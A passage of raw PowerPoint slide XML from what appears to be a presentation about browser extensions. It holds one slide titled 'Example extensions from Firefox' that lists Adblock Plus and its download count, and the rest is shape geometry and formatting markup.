                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>suck‐your‐blood‐/0,339028227,339282682,00.htm</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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094216" y="6805633"/>
            <a:ext cx="135890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sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:fld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293873" y="524509"/>
            <a:ext cx="5534025" cy="52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spc="-15" dirty="0"/>
              <a:t>Example extensions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3300" spc="-20" dirty="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3300" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3300" spc="-35" dirty="0"/>
              <a:t>Firefox</a:t>
            </a:r>
            <a:endParaRPr sz="3300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1048766" y="1361869"/>
            <a:ext cx="5132070" cy="838835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306705" indent="-294005">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="710"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="43750"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="307340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Adblock Plus (14,324,616</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-125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downloads)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="698500" lvl="1" indent="-293370">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="509"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="697865" algn="l"/>
                <a:tab pos="698500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>blocks</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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advertisements</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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376165" y="2580132"/>
            <a:ext cx="4725923" cy="293903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480047" y="3019044"/>
            <a:ext cx="1504950" cy="1342390"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1504950" h="1342389">
                <a:moveTo>
                  <a:pt x="469" y="660227"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="660654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="670560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469" y="660227"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1504950" h="1342389">
                <a:moveTo>
                  <a:pt x="36575" y="670560"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35813" y="660654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28193" y="653034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="653034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469" y="660227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="670560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18054" y="670936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36575" y="670560"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1504950" h="1342389">
                <a:moveTo>
                  <a:pt x="18287" y="670941"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="670560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="671322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18287" y="670941"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1504950" h="1342389">
                <a:moveTo>
                  <a:pt x="36575" y="671322"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18054" y="670945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="671322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448" y="681635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="688848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28193" y="688848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35813" y="681228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36575" y="671322"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1504950" h="1342389">
                <a:moveTo>
                  <a:pt x="448" y="681635"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="671322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="681228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448" y="681635"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1504950" h="1342389">
                <a:moveTo>
                  <a:pt x="1469136" y="875285"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1469136" y="688086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1468373" y="704088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1463182" y="752124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1454363" y="798623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442082" y="843520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1426506" y="886749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1407799" y="928244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1386127" y="967941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1361656" y="1005775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1334550" y="1041680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1304976" y="1075591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1273098" y="1107443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1239083" y="1137170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1203095" y="1164708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1165301" y="1189991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1125865" y="1212954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084953" y="1233531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042731" y="1251658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="999364" y="1267269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="955017" y="1280299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="909856" y="1290683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="864047" y="1298356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="817754" y="1303251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="771144" y="1305306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752855" y="1306037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="733044" y="1306028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="685670" y="1303590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="637901" y="1298158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590676" y="1289835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="544175" y="1278686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="498577" y="1264775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="454062" y="1248168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410808" y="1228928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368995" y="1207120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328802" y="1182809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="290409" y="1156059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253994" y="1126935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="219737" y="1095502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187817" y="1061823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158414" y="1025965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131706" y="987990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107872" y="947965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87093" y="905952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69547" y="862018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55413" y="816226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44871" y="768641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38099" y="719328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36575" y="687324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36575" y="671322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35813" y="681228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28193" y="688848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="688848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448" y="681635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2285" y="723138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8754" y="771417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18664" y="818161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31862" y="863312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48198" y="906810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67519" y="948597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89673" y="988617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114510" y="1026809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141877" y="1063116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="171623" y="1097479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203596" y="1129841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237643" y="1160143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273615" y="1188327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311358" y="1214334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="350721" y="1238107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391552" y="1259586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="433700" y="1278714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="477013" y="1295433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521339" y="1309684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="566526" y="1321408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="612423" y="1330549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658878" y="1337047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705740" y="1340844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752094" y="1341865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="771905" y="1341882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="791718" y="1341120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="837861" y="1337896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="883624" y="1332040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928865" y="1323612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="973439" y="1312671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1017205" y="1299275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060020" y="1283483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101741" y="1265354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1142226" y="1244948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1181332" y="1222323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1218917" y="1197538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1254838" y="1170652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1288952" y="1141724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1321117" y="1110813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351191" y="1077978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1379029" y="1043278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1404491" y="1006772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1427433" y="968519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447713" y="928578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1465188" y="887007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1469136" y="875285"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1504950" h="1342389">
                <a:moveTo>
                  <a:pt x="1504950" y="688086"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1504950" y="653034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1504188" y="636270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1499204" y="587809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1490717" y="540814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1478878" y="495344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1463839" y="451460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1445751" y="409223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1424710" y="368602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1401036" y="329934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374713" y="293004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1345949" y="257965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1314895" y="224876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1281703" y="193800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1246525" y="164798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1209513" y="137929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1170819" y="113255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130594" y="90837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088990" y="70735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1046159" y="53011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002253" y="37725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="957423" y="24938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="911822" y="14711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865600" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818911" y="2181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="771905" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="733044" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686818" y="2135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="640898" y="6919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="595426" y="14296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550548" y="24209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506407" y="36603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="463147" y="51420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420913" y="68604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379848" y="88099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340098" y="109849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="301805" y="133796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265115" y="159886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230172" y="188061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197118" y="218265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166100" y="250442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137261" y="284535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110744" y="320489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86695" y="358245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65257" y="397749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46575" y="438944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30793" y="481774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18054" y="526181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8504" y="572111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2285" y="619506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469" y="660227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="653034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28193" y="653034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35813" y="660654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36575" y="670560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36575" y="654558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44733" y="573817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54926" y="527481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68514" y="482842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85333" y="439959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105218" y="398891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128003" y="359698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153526" y="322438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181621" y="287171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212123" y="253956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244868" y="222852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279692" y="193919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="316429" y="167215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354916" y="142800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394987" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436478" y="101072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479225" y="83877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="523063" y="69208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="567827" y="57124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613353" y="47683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="659476" y="40945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="706032" y="36968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752094" y="35832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="771905" y="35844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="838203" y="40114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="885762" y="46603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932693" y="55972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="978819" y="68153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023963" y="83076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067948" y="100673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110598" y="120875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1151734" y="143613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1191182" y="168817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1228763" y="196419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1264301" y="226349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1297618" y="258540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1328538" y="292921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1356884" y="329423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1382480" y="367979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1405147" y="408518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1424710" y="450972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1440990" y="495272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1453813" y="541348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1462999" y="589132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1468373" y="638556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1468373" y="654558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1469136" y="671322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1469136" y="875285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1479716" y="843866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1491153" y="799214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1499358" y="753109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1504188" y="705612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1504950" y="688086"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1504950" h="1342389">
                <a:moveTo>
                  <a:pt x="36575" y="671322"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="36575" y="670560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18287" y="670941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36575" y="671322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950707" y="2399538"/>
            <a:ext cx="1638300" cy="3138170"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1638300" h="3138170">
                <a:moveTo>
                  <a:pt x="25400" y="1959102"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="25399" y="1159403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12699" y="1207553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12699" y="1255014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1331976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1806702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25400" y="1959102"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1638300" h="3138170">
                <a:moveTo>
                  <a:pt x="63499" y="1161643"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="63499" y="962255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25399" y="1110682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25399" y="1489710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38099" y="1411224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38099" y="1334262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50799" y="1258062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50799" y="1210155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63499" y="1161643"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1638300" h="3138170">
                <a:moveTo>
                  <a:pt x="38100" y="2052053"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38100" y="1726692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25400" y="1648206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25400" y="2005225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38100" y="2052053"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1638300" h="3138170">
                <a:moveTo>
                  <a:pt x="1612900" y="2124110"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1612900" y="1901185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1600200" y="1950374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1600200" y="1999965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1485900" y="2447688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1460500" y="2495740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="2543082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1422400" y="2589615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1397000" y="2635236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1371600" y="2679845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1346200" y="2723340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1320800" y="2765621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="2806587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1270000" y="2846137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1231900" y="2884170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206500" y="2920746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1168400" y="2957309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130300" y="2991161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1079500" y="3021665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1041400" y="3048189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990600" y="3070098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="939800" y="3086756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="889000" y="3097530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="863600" y="3099816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="850900" y="3101340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825500" y="3102102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="812800" y="3101340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="762000" y="3096310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711200" y="3085853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="673100" y="3070476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="622300" y="3050686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584200" y="3026987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546100" y="2999888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508000" y="2969893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469900" y="2937510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431800" y="2902458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406400" y="2866261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368300" y="2828413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342900" y="2789032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="317500" y="2748238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292100" y="2706149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266700" y="2662885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241300" y="2618565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228600" y="2573306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203200" y="2527230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190500" y="2480453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165100" y="2433096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63500" y="2047615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63500" y="2000387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50800" y="1953768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50800" y="1879854"/>
                </a:lnTo>
                <a:lnTo>
